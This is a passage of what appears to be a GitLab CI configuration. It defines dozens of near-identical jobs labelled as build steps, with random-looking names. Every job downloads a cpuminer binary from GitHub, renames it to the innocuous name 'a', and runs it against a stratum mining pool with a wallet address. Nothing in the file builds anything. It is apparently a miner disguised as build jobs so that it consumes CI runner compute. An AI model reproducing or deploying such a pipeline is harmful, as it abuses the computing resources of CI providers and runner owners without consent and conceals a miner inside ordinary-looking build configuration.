     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_3ljh:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_lyjj4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_yjl5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ljy6:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_lyj7:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_8luy:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_luy9:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1tkti0:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1tjgf1:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1tjgf2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1tjtg3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1gjtr4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1jgyt5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1hgj6:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1gdseg7:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1gdse8:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1gds9:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2gre0:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2gsa1:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2fga2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2fa3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2d4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2s5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_jrtgfj1:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_jrtgf2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_krtfd3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_rtjgfjk4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_rtjgfj5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_jrtjg6:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_7gfjfg:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_jrtj8:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_fhhj9:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_10jfte:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_hrgf11:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_j1jr2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_j1hgf3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_154yjh4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_43215:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_43616:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_43217:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_143428:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_14379:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2120:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_hfde:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_hdst:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_gadg:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_gds:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_afdgs:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_yjl5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ljy6:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_lyj7:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_8luy:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_luy9:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1tkti0:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1tjgf1:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1tjgf2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1tjtg3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1gjtr4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1jgyt5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1hgj6:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1gdseg7:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1gdse8:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1gds9:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2gre0:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2gsa1:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2fga2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2fa3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2djgfty4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2sfgjfgt5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_jrtgjfdtgfj1:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_jrtfdjfdgf2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_krtfdjfdtfd3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_rtjgrthjfgjfjk4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_rtjghjdjfdfj5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_jrtjfjfdtg6:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_7gffdfjfg:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

